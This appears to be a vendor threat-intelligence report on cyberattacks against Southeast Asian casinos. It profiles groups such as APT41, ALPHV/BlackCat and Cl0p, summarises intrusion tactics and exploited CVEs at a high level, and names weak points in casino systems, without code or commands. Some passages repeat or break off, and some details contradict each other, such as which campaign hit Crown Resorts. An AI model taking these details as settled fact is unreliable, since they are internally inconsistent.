Introduction

Casinos and integrated resorts in Southeast Asia are increasingly in the crosshairs of sophisticated cyber adversaries and rising cybersecurity risks.

Since January 2024, a surge of attacks has hit casino operators, hospitality systems, and gaming technology suppliers. These incidents have ranged from state-sponsored cyber-espionage to financially motivated ransomware heists. Major breaches at Philippine and Singaporean resorts in late 2023 foreshadowed many of the themes that became prominent in 2024. 

High-profile incidents involving Marina Bay Sands, IGT, and a major Philippine Resort highlight the diversity of adversary motivations — from data theft and extortion to surveillance and geopolitical interests. Supply chain compromises, insider threats, and unreported breaches further complicate the picture. 

Chinese state-affiliated groups, reportedly acting in line with Beijing’s crackdown on offshore gambling, have conducted surveillance campaigns against casinos in the Philippines, Cambodia, and Laos. Meanwhile, ransomware operators such as ALPHV/BlackCat, Cl0p, and LockBit continue to exploit gaps in readiness, often relying on leak site disclosures to pressure victims into payment. 

This report consolidates recent incidents, vendor intelligence, and regional reporting to provide cybersecurity leaders with a focused view of the threat landscape. It explains why casinos remain prime targets, outlines the tactics being used against them, and offers tailored recommendations to strengthen resilience. 

Methodology

THEOS Cyber does not make independent attribution. References to groups such as APT41 or BlackCat are based on vendor assessments and open-source intelligence. Where incidents are based only on ransomware leak-site claims or other unconfirmed sources, this has been noted.

Why Southeast Asia’s Casinos Are Prime Targets

Land-based casinos and integrated resorts in Southeast Asia have become high-value targets for cyber adversaries. Since January 2024, a surge of attacks has hit casino operators, hospitality systems, and gaming technology suppliers. These incidents have ranged from state-sponsored espionage to financially motivated ransomware campaigns. Breaches at Philippine and Singaporean resorts in late 2023 foreshadowed many of the themes that became prominent in 2024.

The casino industry remains highly attractive to adversaries. Ransomware operators deploy double extortion tactics to maximise leverage, while state-affiliated groups use long-dwell intrusions to gather intelligence. Both approaches threaten sensitive systems and critical data. What makes casinos uniquely vulnerable are their sprawling, always-on digital environments. Gaming floors, hotel operations, and back-office systems are often poorly segmented, with legacy IT and operational technology intertwined. Even slot machine networks — never designed with today’s threats in mind — can provide attackers with an unexpected foothold. Combined with under-resourced security teams, these factors create an unusually wide and appealing attack surface.

This report consolidates threat intelligence from both public reporting and private vendor sources — including research from groups such as CrowdStrike, ESET, and Kaspersky — together with THEOS Cyber’s own insights from regional operations. While we do not conduct original attribution, we align on established vendor assessments and focus on translating these findings into practical implications for casino operators. China’s crackdown on gambling in Macau

Proactive defence remains essential: robust detection, continuous monitoring, and rapid response capabilities are far more effective than relying solely on post-incident remediation.

According to Sophos’ State of Ransomware 2025 report, the average ransom payment dropped by 50% to USD 1 million. Yet 57% of demands still exceeded USD 1 million, and nearly half of the victims paid. The data underscores that while payouts may be lower, pressure on victims remains high due to faster attacks and double-extortion tactics.

The following sections provide a focused view of current threat vectors, illustrated by real-world campaigns, together with recommendations tailored for the casino sector.

THEOS Cyber supports casino and integrated resort operators across Southeast Asia with services including Managed Threat Detection & Response (MTDR), Digital Forensics & Incident Response (DFIR), red teaming, and adversary simulation.

Threat Actors Targeting the Casino Sector

Casinos and integrated resorts in Southeast Asia face threats from both state-affiliated groups and financially motivated cybercriminals. Their objectives differ — espionage, surveillance, financial theft, or extortion — yet their techniques often overlap, exploiting common weaknesses such as flat networks, vulnerable third-party suppliers, and delayed patching cycles.

The following overview highlights key actors, notable incidents, and the tactics, techniques, and procedures (TTPs) they have been reported to use.

State-Sponsored APT Groups
APT41 (aka Wicked Panda / Winnti / Brass Typhoon)

APT41 exemplifies the convergence of espionage and financial crime. In 2024, security researchers observed the group pivoting from surveillance to direct monetization. (Sources: Sophos; additional public reporting.)

In one campaign — dubbed Operation Crimson Palace by Sophos — APT41 maintained access to a gambling operator’s network for nearly nine months, siphoning data, planting cryptominers, and disrupting systems.

Tactics observed included:

    • DLL hijacking for stealthy persistence
    • Abusing legitimate admin tools like WMIC.exe
    • Active Directory DCSync attacks to steal high-privilege credentials
    • Targeting VPN subnets to pivot laterally

Open reporting over 2023–2025 indicates elevated focus on Southeast Asian gambling targets among China-linked clusters; commonly cited drivers include strategic interests and high cash flows in the sector.

Bronze Starlight (Operation “ChattyGoblin”)

Bronze Starlight has targeted regional gambling firms via supply-chain tampering and deceptive tradecraft. In one campaign dubbed “ChattyGoblin” by ESET, attackers trojanized the LiveHelp100 customer-support app used by a Philippine casino, keeping the UI functional while loading malicious components. (Source: ESET; corroborating public analysis.)

Tactics reported:

    • HUI Loader side-loading via legitimate signed binaries
    • Abuse of stolen code-signing certificates to increase trust
    • Custom backdoors configured to terminate outside Asia
    • Fake ransomware stages to create noise and delay incident response

Attribution of ChattyGoblin to Bronze Starlight remains debated. Technical overlaps exist, but not all researchers agree. The case highlights supplier/provenance risk and code-signing abuse, with objectives more aligned to surveillance than smash-and-grab disruption.

DiceyF (aka Earth Berberoka)

DiceyF assessed as likely China-linked and focused on online gambling platforms in Southeast Asia. Kaspersky and Trend Micro identified its custom GamePlayerFramework that orchestrates modular plugins for stealthy collection and remote control, emphasizing espionage and data theft over immediate monetization.

Tactics reported:

    • Custom loaders and multi-stage GamePlayerFramework
    • Modular keyloggers/clipboard and targeted file collection
    • Persistence via run keys / scheduled tasks
    • Low-noise C2 with infrequent beacons; HTTP(S) exfiltration in staged archives

Together, Bronze Starlight and DiceyF illustrate the breadth of China-linked campaigns: from supply-chain compromises to custom malware frameworks designed for long-term surveillance of casino operators.

Lazarus Group (aka APT38)

Lazarus/APT38 is attributed in public reporting with financially motivated operations across gambling and crypto (see MITRE ATT&CK: APT38 for profile and TTPs). In September 2023, approximately USD 41 million was stolen from Stake.com; the FBI publicly attributed the theft to Lazarus/APT38 on September 6, 2023. and laundered across chains—an adjacent case that underscores exposure to state-linked financial theft in the wider gambling ecosystem. (Law-enforcement/public statements; vendor analysis.)

Tactics reported:

    • Initial access via social engineering/supplier footholds; valid accounts
    • Wallet/credential theft (seed/API keys) and automated withdrawal scripts
    • Rapid laundering through mixers, cross-chain swaps/bridges, and peel chains
    • Custom loaders/beacons alongside commodity tooling for cover

While Stake.com was an online casino, the case highlights Lazarus’ appetite for gambling-linked enterprises. Beyond casinos, the group is also widely reported to target banks and financial infrastructure worldwide, blending state priorities with revenue generation.

Cybercriminal Groups (Financially Motivated)
ALPHV / BlackCat (RaaS) and Scattered Spider (Affiliate / Access Broker)

BlackCat (also known as ALPHV) is a ransomware-as-a-service (RaaS) group whose affiliates have repeatedly targeted casinos and hospitality firms. In 2023, the group became notorious for combining identity compromise with double extortion (data theft + encryption), applying pressure through leak-site shaming to secure multimillion-dollar ransom payments (Industry and media reporting.)

A key enabler has been Scattered Spider (also tracked as Octo Tempest, UNC3944, 0ktapus, Muddled Libra) — an English-speaking cybercrime crew that evolved out of The Com (“The Community”), a loose network of SIM-swapping and phishing actors. SANS reporting (2024) and multiple vendor analyses note that Scattered Spider frequently acts as an affiliate and access broker for ALPHV/BlackCat. The group specializes in social engineering help desks, MFA fatigue, SIM swaps, and identity provider (IdP) hijacking, then hands over enterprise access to BlackCat operators for ransomware deployment.

Notable Incidents:

    • MGM Resorts (Sep 2023): Scattered Spider impersonated MGM’s help desk, allowing BlackCat to deploy ransomware that paralyzed casino floors — shutting down thousands of slot machines, ATMs, room keys, and reservations. Estimated losses exceeded USD 100 million.
    • Caesars Entertainment (Sep 2023): Attackers stole customer data, including Social Security and driver’s license numbers, and reportedly extorted a USD 15 million ransom to prevent leaks.
    • Southeast Asia Casino Operator (Nov–Dec 2023): A major outage disabled slot machine banks and hotel systems. Management cited “technical issues,” but ALPHV later claimed responsibility on its leak site and began releasing internal data.

Tactics reported:

    • Social engineering via phone/SMS phishing, SIM swapping, and MFA fatigue
    • Abuse of IdPs (e.g., Okta) for session hijacking and device registration
    • Use of remote monitoring and management (RMM) tools to blend in with admins
    • Data exfiltration before encryption; leak-site coercion as leverage
    • Deployment of ALPHV/BlackCat ransomware across Windows domains

Casinos and resorts are particularly vulnerable because service downtime directly impacts revenue and reputation. The BlackCat–Scattered Spider partnership combines people-focused intrusion (social engineering) with technical precision (rapid ransomware deployment), maximising leverage over operators. As SANS noted, Scattered Spider represents the trend of English-speaking cybercriminals partnering with Russian-speaking RaaS groups — a convergence that has raised the cost and complexity of defending casino and hospitality enterprises.

(Sources: SANS “Defending Against Scattered Spider and The Com,” 2024; CrowdStrike; Microsoft; FBI; SEC filings)

Cl0p (TA505) – Data Theft at Scale / MOVEit

Cl0p’s MOVEit mass-exploitation (2023) compromised hundreds of organizations, including casino-adjacent suppliers, demonstrating how operator risk extends to third-party ecosystems. Cl0p commonly favors data-theft-only extortion (no encryption) at scale. (Public advisories and vendor reporting.)

Notable incidents:

    • Aristocrat Leisure (2023): Breach via MOVEit exploitation; employee data exposed.
    • Crown Resorts (2023): Data exfiltrated during GoAnywhere MFT exploitation; operational impact limited but reputational risk high.
    • Broader Supply-Chain Campaigns (2023): Hundreds of enterprises worldwide were hit during MOVEit exploitation, showing how hospitality and casino operators can be collateral damage when trusted vendors or IT providers are compromised.

Tactics reported:

    • Zero-day exploitation of secure file transfer applications (MOVEit, GoAnywhere, Kiteworks)
    • Automated exfiltration of bulk archives for negotiation leverage
    • Quadruple extortion: data theft, leak-site shaming, encryption (in some campaigns), and direct customer contact
    • Use of Cobalt Strike and other post-exploitation tools for lateral movement
    • Credential harvesting with native Windows tools

 

Cl0p highlights the outsized supply-chain risk for casinos and integrated resorts. Even when core casino systems are not directly targeted, breaches at gaming technology providers, payroll processors, or hospitality service vendors can expose sensitive employee or customer data. For CISOs, this underlines the need to treat third-party platforms (particularly secure file transfer systems) as Tier-1 critical infrastructure, with compensating controls such as virtual patching, restricted access, and strict egress monitoring.

(Sources: Microsoft, CISA, industry reporting on MOVEit and GoAnywhere campaigns, vendor breach disclosures)

Other RaaS & POS-Targeting Threats (LockBit, Hive, Medusa, FIN7, FIN8, CHEF Spider)

Beyond ALPHV and Cl0p, other ransomware-as-a-service groups such as LockBit and Hive have also listed casino or hospitality-related victims in recent years, though specific Southeast Asian cases often remain unconfirmed. Medusa ransomware has extorted hotels, including a luxury Singapore hotel chain reportedly hit in 2024.

Meanwhile, POS-focused groups such as FIN7, FIN8, and CHEF Spider continue to pose risks. These actors historically breach internet-facing servers to implant POS malware (e.g., ShellTea), aiming to siphon payment card data. In 2023, CrowdStrike observed CHEF Spider shifting to service providers supporting hospitality and gaming operators, broadening the exposure path.

These groups highlight the breadth of monetization models in casino-focused cybercrime: from RaaS extortion (LockBit, Hive, Medusa) to low-level financial theft via carding syndicates (FIN8, CHEF Spider). The common thread is that attackers exploit customer-facing services and third-party providers, where downtime or data theft directly translates to lost revenue, reputational harm, and regulatory scrutiny.

(Sources: CrowdStrike, CISA, ComputerWeekly)

Summary of Key Threat Actors

The casino threat landscape in Southeast Asia reflects an eclectic mix of adversaries:

    • State-backed attackers — primarily China- and North Korea-linked APTs conducting espionage and financially motivated campaigns.
    • Cybercriminal groups — ransomware operators and carding syndicates pursuing extortion, customer data theft, or payment card fraud.

The table below summarises the most prominent threat actors observed or reported to target casinos and integrated resorts in the region:

Threat ActorAffiliationPrimary MotiveNotable Campaigns / TTPs
APT41Chinese APTEspionage +  Financial TheftCrimson Palace; DCSync; cryptomining; long-term monetisation intrusions
Bronze StarlightChinese APTEspionage

ChattyGoblin; LiveHelp100 trojan; HUI Loader; supply-chain tactics

DiceyF / Earth Berberoka

Berberoka

Suspected Chinese APT

Espionage

GamePlayerFramework; modular surveillance; long-term data theft
Lazarus / APT38North Korean APTFinancial TheftStake.com heist; crypto laundering; also active against financial infrastructure worldwide
ALPHV + Scattered SpiderRaaS + affiliateRansomwareMGM, Caesars, Southeast Asia casino operator (claimed)
Cl0pRaaS GroupRansomwareMOVEit exploitation; Aristocrat; Crown Resorts (claimed)
Other RaaS & POS Groups (LockBit, Hive, Medusa, FIN8, CHEF Spider)RaaS + Financial CrimeRansomware + Card TheftLockBit/Hive leak site listings; Medusa hit Singapore hotel (2024); POS malware (ShellTea); service provider targeting
Local Cybercrime SyndicatesRegional groupsFraud / Opportunistic IntrusionsSoutheast Asia scam/fraud operations; potential pivot to resort IT or guest targeting, but fewer confirmed major incidents vs. international groups

Attribution Note: Some incidents listed in this report, particularly those involving Cl0p and a major Philippine resort, are based on threat actor leak site claims or indirect technical indicators. Where victim organisations have not publicly confirmed the breach, this has been clearly marked within the corresponding sections.

Notable Cyber Incidents Targeting the Sector (2023–2025)

Several significant cyber incidents have affected Southeast Asian casinos and integrated resorts from late 2023 through 2025. These case studies illustrate the range of threats – from data breaches to full-blown ransomware outages – impacting the sector.

Attribution Note: Some incidents listed below are based on threat actor leak site disclosures or indirect indicators. Where public victim confirmation is unavailable, this has been noted.

Southeast Asia Casino Operator Ransomware Outage (Philippines, Nov 2023)

A suspected ransomware attack shut down casino operations for nearly a week. Slot machines and kiosks went offline, ATMs and payments were disrupted, and hotel guests experienced service issues. Management initially cited an “IT systems issue,” but ALPHV/BlackCat later claimed responsibility and leaked internal data, suggesting ransom demands were refused. The gap between the operator’s official explanation and the attackers’ disclosure highlighted the credibility and reputational risks that follow long after technical recovery.

Impact: Operational downtime (gaming revenue loss), customer data exposure, reputational harm.

Significance: First major ransomware incident publicly tied to a Southeast Asian casino, highlighting the region was not spared from the wave of global casino attacks (MGM, Caesars).

IGT Supplier Breach (Global, Nov 2024)

In November 2024, International Game Technology (IGT) – one of the world’s largest manufacturers of slot machines and casino systems – disclosed a cyberattack that disrupted parts of its IT systems and required continuity measures. Industry reporting likened it to other extortion-driven attacks, noting similarities to MGM, Aristocrat, and others hit by ransomware.

Impact: Potential exposure of R&D data and casino client information; service disruptions for downstream operators.

Significance: Supply-chain risk amplified — a vendor compromise can cascade across many casinos. If attackers gain source code or firmware, vulnerabilities could be weaponised on gaming floors.

Other Incidents

Beyond the headline breaches, several hospitality-focused cyberattacks underscore the broader risks to integrated resorts, where hotel, retail, and casino systems are often interconnected.

COMO Hotels & Resorts (Singapore HQ, Apr 2024)
RED Ransomware claimed theft of guest and HR data (including accounting records, contracts, and PII). COMO has not confirmed the breach; scope remains unverified.

Shangri-La Hotels (Asia, 2022 disclosure)
Attackers accessed guest databases at eight properties across Hong Kong, Singapore, Taiwan, Japan, and Thailand. ~290,000 Hong Kong guest records were exposed (names, contact info, membership/reservation data), though passports and payments were encrypted. Detection lag raised regulatory concern.

Crown Resorts (Australia, 2023)
Caught in Cl0p’s MOVEit supply-chain campaign.

Navajo Nation Casinos (U.S., 2023)
Ransomware disrupted tribal gaming operations.

DDoS Attacks (2023–2024)
ENISA reported that gambling was the single most targeted sector globally for DDoS in late 2023 (42% of incidents). In Southeast Asia, several online betting and crypto-gaming platforms faced extortion-driven DDoS campaigns — “pay or be knocked offline.”

Attribution Note: The Shangri-La and COMO Hotels incidents were disclosed via corporate statements and ransomware leak sites, respectively. As of this writing, COMO Hotels has not confirmed the breach publicly.

Tactics, Techniques, and Procedures (TTPs) Against Casinos

Threat actors targeting casinos and integrated resorts use a diverse mix of social engineering, software exploits, and stealthy lateral movement. Key TTP themes include:

Social Engineering & Phishing

Many casino attacks begin by targeting human vulnerabilities. The MGM breach was initiated by a voice phishing (vishing) call to an IT helpdesk staff. The attacker impersonated an employee and convinced support to reset credentials, granting access to internal systems.

Other attacks have used spear-phishing emails carrying malware or fake remote support requests. With large hospitality workforces, casinos and resorts are particularly vulnerable to credential theft through well-crafted lures. Attackers sometimes tailor their phish using guest data, loyalty programs, or internal project names.

AI tools like deepfake voice cloning now make vishing even more convincing. As one expert put it: “imagine getting a call from a ‘family member’ in distress — speaking with their voice.” Phishing campaigns often aim for VPN orsteal  RDP credentials — digital keys that once, compromised, can unlock core systems.

Exploiting Internet-Facing Systems

Both APT and cybercriminal groups exploit vulnerabilities in exposed servers or applications common in casino environments. In one wave of intrusions across Southeast Asia in 2023, web servers were compromised and web shells installed — giving attackers persistent backdoors into corporate networks.

Ransomware operators also target weaknesses in VPN gateways, RDP servers, or outdated software. In some Southeast Asian casino cases, investigators suspect attackers may have gained initial access through unpatched systems or weak remote access protections, though the exact vectors remain unconfirmed.

The Cl0p group’s use of MOVEit and GoAnywhere zero-day exploits in 2023 allowed them to steal data from dozens of organizations, including casino technology providers such as Aristocrat.

Unpatched critical vulnerabilities in file servers, content management systems, or even IoT devices (like digital signage or smart lighting) can provide the same kind of entry point for attackers.

Living off the Land & Legitimate Tools Abuse

Once inside a network, attackers often use built-in admin tools or legitimate software to move undetected.
Remote monitoring and management (RMM) tools have been a favorite of targeted eCrime groups in hospitality. In 2023, CrowdStrike observed groups like CHEF Spider and DISTANT Spider using off-the-shelf RMM apps like ConnectWise ScreenConnect and NetSupport Manager to maintain access on casino systems. These tools appear harmless because they’re often used by IT teams, making them perfect for blending in.

Sometimes, attackers trick users into running an installer; other times, they exploit servers to silently deploy the RMM agent. From there, they gain persistent remote desktop access under the guise of routine maintenance. These tactics have been used to reach point-of-sale networks or stage ransomware attacks.

APT41, linked to multiple casino intrusions, also leaned heavily on Windows built-in utilities — abusing WMIC.exe for persistence and likely running PowerShell scripts and net use commands for lateral movement.

These “living off the land” techniques allow attackers to operate without importing a lot of malware, thus evading some defenses.

Malware and Implants

Even when attackers rely on legitimate tools to blend in, custom malware often enters the picture at some stage. Chinese espionage groups have deployed multifaceted frameworks like GamePlayerFramework (also called DiceyF), which includes modules for keystroke logging, data exfiltration, and persistent access.

APT41, linked to multiple casino intrusions, was observed using the HUI Loader to execute payloads in memory and maintain stealth. One of the backdoors they deployed, known as “MistyCloud” (per SentinelOne reports), allowed ongoing covert access to compromised systems without detection.

On the ransomware front, ALPHV/BlackCat is typically introduced after initial access. In MGM’s case, ransomware was launched just one day after the social engineering attack, once domain admin rights were secured.

Notably, Unit 42 reported that BlackCat affiliates deployed a tool named “Munchkin” – a small Linux virtual machine planted inside victim networks to run ransomware from within and evade detection.

This trend of attacker-controlled virtual infrastructure inside victim environments has also been seen with RagnarLocker and is particularly dangerous for casinos, where virtualization environments may be less tightly monitored.

Lateral Movement via VPN/AD

In the large casino intrusions, attackers quickly escalate privileges and move laterally through the IT environment.

APT41’s campaign, for example, specifically targeted a VPN subnet (10.20.22.x), suggesting an attempt to access otherwise segmented systems or bridge to operational tech. They also performed Active Directory reconnaissance and DCSync attacks to impersonate a domain controller and steal password hashes. This gave them keys to the kingdom – enabling access to databases, file shares, and even ICS or CCTV networks if connected.

Ransomware operators similarly try to access Active Directory to deploy ransomware widely via domain group policies or enterprise software deployment tools. The interconnectivity of resort systems (hotel check-in, player databases, surveillance, building control) means that once attackers get a foothold, they can pivot to multiple sensitive systems.

In one Southeast Asian casino case, multiple operational systems beyond just slot management were affected — underscoring how quickly attackers can spread laterally through a resort’s network

Persistence and Evasion

Attackers aim to maintain access even in environments with active defenders.

Persistence techniques include creating local admin accounts, deploying web shells, and scheduling tasks. In one Southeast Asian case, threat actors installed open-source VPN software on a victim server and connected out to attacker-controlled GitHub hosts. Chinese groups have used stolen code-signing certificates (e.g., Ivacy VPN certificate) to help malware evade detection.

Ransomware groups like Scattered Spider have shown real-time response capability. When defenders at MGM began isolating systems, the attackers accelerated ransomware deployment. Unit 42 found they even tried to steal incident response playbooks to anticipate response actions.

In at least one Southeast Asian casino breach, defenders shut down systems quickly — a move that helped contain the intrusion but disrupted operations.

Data Exfiltration and Theft

Nearly all recent casino incidents involve data theft, not just encryption. BlackCat reportedly stole 6 terabytes from MGM and Caesars, while a Southeast Asian casino breach also saw internal files taken, and Cl0p exfiltrated employee data from Aristocrat.

APT groups also go after sensitive databases, like VIP guest lists, financial records, or surveillance footage — often quietly and over long periods. Attackers use encrypted channels or cloud services like OneDrive or Dropbox, knowing these are less likely to be blocked.

Some intruders package data into password-protected archives and upload them to attacker-controlled cloud buckets during off-hours to avoid detection. The amount and sensitivity of casino-held data — including passports, financial info, and betting histories — makes these targets exceptionally lucrative. Even state actors may seek such data for espionage or to enable phishing campaigns against high-profile gamblers.

Denial-of-Service as Distraction/Extortion

While breaches are the primary goal, some attackers also launch DDoS attacks as a smoke screen or added pressure during ransom negotiations. These “Ransom DDoS” (RDDoS) campaigns have hit Asian online casinos, flooding betting portals with junk traffic until a payment is made.

Most DDoS attacks in this sector are relatively low-volume but disruptive. ENISA reported that by late 2023, the gaming and gambling sector had become the single most targeted industry for DDoS globally, accounting for 42% of all observed attacks.

In some cases, DDoS may serve as a diversion — distracting IT teams while a quieter intrusion unfolds elsewhere. For casinos with online services such as booking portals, loyalty apps, or betting platforms, the risk of blended attacks (DDoS plus ransomware/extortion) remains high.

Summary of TTPs 

Recent incidents in casinos and integrated resorts show adversaries blending social engineering, software exploits, and stealthy movement to achieve impact quickly. Many campaigns unfold rapidly — MGM attackers obtained domain admin within 24 hours and launched ransomware soon after — while others, like state-linked espionage groups, stay hidden for months.

Below is a breakdown of observed TTPs mapped to MITRE ATT&CK stages:

From phishing to lateral movement, from custom malware to DDoS smoke screens, attackers exploit the full spectrum of tactics to breach casino networks. Many incidents unfold rapidly—like the MGM case, where attackers gained domain admin access and launched ransomware within a day. But even slower, stealthy intrusions show a deep understanding of resort environments. Adversaries often blend in using legitimate tools, exfiltrate sensitive data quietly, and adapt quickly when detected. For casinos, understanding these TTPs is critical not only for defense, but for anticipating the next move in an evolving threat landscape.

Below is a breakdown of observed TTPs from recent casino incidents, aligned to the stages of the MITRE ATT&CK framework:

    • Initial Access: Phishing/vishing (MGM); web app exploit & web shell (various SEA APT intrusions); supply-chain compromise (Aristocrat via MOVEit exploit).
    • Execution: User executes trojanized software (ChattyGoblin LiveHelp agent); scheduled tasks to run malware; WMI scripts (APT41).
    • Persistence: Create new local admin accounts; install web shells on servers (APT in SEA); maintain VPN backdoor tunnels (APT case with custom VPN server).
    • Privilege Escalation: Steal AD credentials via DCSync (APT41); keyloggers capturing admin passwords (DiceyF); exploit Windows privilege escalation flaws.
    • Lateral Movement: Use RDP with stolen creds; deploy RMM tools like ScreenConnect (eCrime); pivot through shared file servers; target backup servers and domain controllers early (common ransomware practice).
    • Evasion: Abuse signed binaries and LOLBins (living-off-the-land tools); disable antivirus/EDR; deploy attacker-controlled VMs (“Munchkin”) to bypass host defenses.
    • Exfiltration: Compress and exfiltrate over HTTPS or to attacker-controlled cloud storage; leverage legitimate file-sharing (e.g., OneDrive API) to blend in.
    • Impact: Deploy ransomware to encrypt systems (BlackCat, LockBit); in espionage cases, maintain covert access for extended periods (APT41 observed ~9 months in some environments).

Key takeaway: Adversaries aren’t relying on one trick — they chain social engineering, vulnerabilities, and legitimate tools to blend in and strike fast. Casinos must therefore defend against both “loud” ransomware crews and stealthy APTs with equal vigilance.

Key Malware, Tools, and Exploits

Several malware families and hacking tools have featured prominently in recent attacks on casinos and integrated resorts:

BlackCat (ALPHV) Ransomware

A modern ransomware family written in Rust, used by the ALPHV cartel. It was the payload that crippled MGM’s IT systems and was likely the same encryptor used in a Southeast Asian casino attack.

BlackCat is known for its adaptability – it targets Windows, Linux, and ESXi hypervisors, includes modules for data theft, and supports deployment of the “Munchkin” VM to bypass security tools. BlackCat is operated by affiliates who often first infiltrate via other means (like Scattered Spider’s social engineering).

Notable capability: BlackCat’s encryptor is highly configurable (can encrypt certain files, skip others for stability), and it tries to delete backups and shadow copies to ensure ransom leverage.

Cl0p Ransomware and Data-Theft Tools

Associated with FIN11/TA505, Cl0p focuses on data theft and extortion. Rather than custom malware for initial access, Cl0p’s hallmark is exploiting zero-day vulnerabilities in widely used file transfer software (MOVEit Transfer, Accellion FTA, Fortra GoAnywhere).

In 2023, Cl0p’s mass exploitation of MOVEit (CVE-2023-34362) compromised over 600 organizations, including Aristocrat Leisure. Their method typically involves a custom web shell/dropper that exfiltrates databases via SQL queries. Cl0p then extorts victims with publishing the data on their leak site if no payment is made.

For casinos, this highlights the risk of third-party software; both Aristocrat and Crown Resorts were impacted by file-sharing platform vulnerabilities.

Custom Casino-Focused RATs/Backdoors 

Chinese APTs have deployed bespoke malware in casino espionage campaigns. DiceyF’s GamePlayerFramework is a modular RAT tailored for casino espionage, with modules nicknamed “Tifa” and “Yuna” (after game characters), capable of keystroke logging, clipboard theft, and payload deployment.

Operation ChattyGoblin featured a trojanized binary signed with a stolen certificate, masquerading as LiveHelp software, to backdoor Philippine casino systems.
Tools like HUI Loader (used by Bronze Starlight/APT41) decrypt payloads in memory and are frequently seen in Southeast Asian espionage. These indicate a high level of investment in stealth and persistence.

Point-of-Sale (POS) Malware

Although ransomware dominates headlines, card data theft via POS malware remains an ongoing but quieter threat. Malware families like MonitorMiner, DMSniff, and TreasureHunt have been used to infect POS terminals in hospitality venues.

CrowdStrike reported that CHEF Spider targeted POS systems in the sector, suggesting tools like “Pizza Thief” POS malware or Carbanak/Anunak (used by FIN7) could be repurposed for casinos.

Attackers who compromise a casino’s corporate network may drop RAM-scraping malware on POS servers or Windows-based cash registers to harvest credit card data. While no major Southeast Asian card breach has been publicized recently, it remains a known risk.

Cobalt Strike and Post-Exploitation Kits

Frameworks like Cobalt Strike Beacon, Sliver, and Meterpreter are widely used to establish command-and-control (C2) after initial access. In incidents like MGM, after obtaining credentials, attackers deployed Cobalt Strike beacons to maintain persistence and orchestrate lateral movement.

Casinos have detected Cobalt Strike on their networks in several incidents, often masquerading as benign processes. Brute Ratel, a stealthier successor, and open-source frameworks like Empire could also be used by APTs. The presence of these tools is a strong indicator of hands-on-keyboard activity by skilled operators.

Exploits & Vulnerabilities of Note

Key exploited vulnerabilities impacting this sector included:

    • MOVEit Transfer (CVE-2023-34362) – exploited by Cl0p in the Aristocrat breach.
    • Accellion FTA 0-day – exploited by Cl0p in early 2021 (linked to Crown Resorts exposure in 2023).
    • Zoho ManageEngine ADSelfService Plus (CVE-2021-40539) – leveraged by Chinese APTs.
    • VPN appliances (Pulse Secure, Fortinet, etc.) – frequent APT ingress vector.
    • Windows PrintNightmare (CVE-2021-34527) – privilege escalation bug.
    • Confluence, Citrix, and Exchange flaws – critical vulns that casinos have been slow to patch, leaving entry points for both APT and ransomware groups.

In short, ransomware families (BlackCat, Cl0p, and LockBit), specialized RATs (like GamePlayerFramework), and a suite of exploits/post-exploitation kits form the arsenal used against casinos. State actors tend to favor stealthy implants and RATs for espionage, while cybercriminals deploy blunt-force tools for maximum extortion—making defense a high-stakes challenge for this industry.

Vulnerabilities in Casino Operational Systems

Casinos and integrated resorts present an unusually broad attack surface. Their operations span corporate IT, specialised gaming systems, hospitality platforms, and smart building infrastructure — each a potential entry point for attackers. Key areas of exposure include:

Hospitality & Hotel IT Systems

Integrated resorts run hotel management platforms that control everything from electronic door locks to reservation databases and spa systems. These systems may be outdated or not segmented from the casino network. For example, the MGM attack caused digital room key locks to fail and guests to be locked out, implying the door key system was networked and got disrupted by malware or a precautionary shutdown. Hotel guest Wi-Fi networks, if not properly isolated, can also be a weak point – the classic “DarkHotel” APT operations targeted travelers via hotel Wi-Fi malware. A casino’s VIP guests and executives connect to these networks, making them potential targets for man-in-the-middle attacks or credential theft. Email systems for hotel reservations could be phishing entry points (e.g., a fake booking request carrying malware to a reservations clerk).

Point-of-Sale (POS) and Payment Systems

Restaurants, bars, and retail outlets within a casino often run 24/7 on Windows-based POS terminals that may not be frequently patched. These systems are frequent targets for memory-scraping malware to steal card data. Attackers who infiltrate the corporate network can quietly deploy skimmers on any vulnerable endpoint. ATMs inside resorts have also been targeted—most notably in 2019, when an Eastern European gang hacked resort ATMs in Macau. Some incidents involved jackpotting malware, where attackers made ATMs “spit out” cash without triggering financial reconciliation. Cash cage systems and e-wallet platforms, which manage chips or cashless gaming credits, are also potential high-value targets.

 Casino Management Systems (CMS):

CMS platforms are the digital brains of the gaming floor – managing slot machine status, jackpots, player tracking, and loyalty programs. A vulnerability in the CMS can cause wide disruption — in one Southeast Asian incident, the majority of slot machines went offline, likely due to the central system being severed or deliberately shut down to contain malware spread.

While modern gaming machines have safeguards against direct tampering, administrator access to the CMS creates powerful opportunities for attackers. They could:

    • Distribute ransomware or malware to all connected endpoints simultaneously.
    • Harvest sensitive data, including high-roller betting histories, loyalty records, and operational revenue data.
    • Manipulate or corrupt loyalty program balances for financial gain.

Though CMS and surveillance networks are typically segmented on separate VLANs, weak isolation, insider knowledge, or poor architecture often allows attackers to pivot from corporate IT into casino OT. This makes the CMS not only a crown jewel for extortion attempts but also a conduit for broader operational disruption.

IoT and Smart Building Systems:
Modern integrated resorts are effectively smart cities in miniature – with IoT powering HVAC systems, lighting, elevators, CCTV, and even guest amenities. While these technologies improve efficiency and experience, they also introduce a wide and often under-secured attack surface.

The infamous 2017 “fish tank thermometer hack” remains a cautionary tale: attackers breached a North American casino’s network through a connected aquarium sensor and pivoted to steal data. Similar risks persist today as many building management systems still run on embedded or legacy operating systems with default credentials.

If compromised, adversaries could:

    • Disrupt HVAC or power systems to cause chaos on the gaming floor.
    • Hijack CCTV feeds to spy on VIP guests or security staff.
    • Manipulate badge access or smart elevators to facilitate physical intrusion.
    • Exploit poorly secured IoT controllers as footholds into more sensitive IT or OT systems.

Research in 2022 also revealed vulnerabilities in popular hotel digital safes, raising concerns that attackers could target high-roller suites or guest valuables. For casinos, this convergence of IT, OT, and IoT means that what seems like a low-risk device (e.g., an aquarium sensor, smart thermostat, or digital signage system) could serve as a beachhead for broader compromise.

The sheer diversity of IoT deployed in resorts – often managed by different vendors and rarely patched with urgency – makes this category one of the most unpredictable and dangerous vectors in the casino threat landscape.

Legacy Software and OS

Many casino-specific systems – from electronic gaming machines and ticketing kiosks to digital signage – still run on outdated operating systems such as Windows 7, XP Embedded, or proprietary RTOS. These platforms are difficult and expensive to upgrade, often requiring hardware replacement or regulatory recertification, so they remain online long after vendor support has ended.

Attackers exploit these weak points. For example, slot machine client software running on Windows 7 could be compromised via an unpatched SMB vulnerability, allowing malware to spread machine-to-machine across the gaming floor. Outdated back-office software is also common, creating exploitable gaps across HR, finance, and operations.

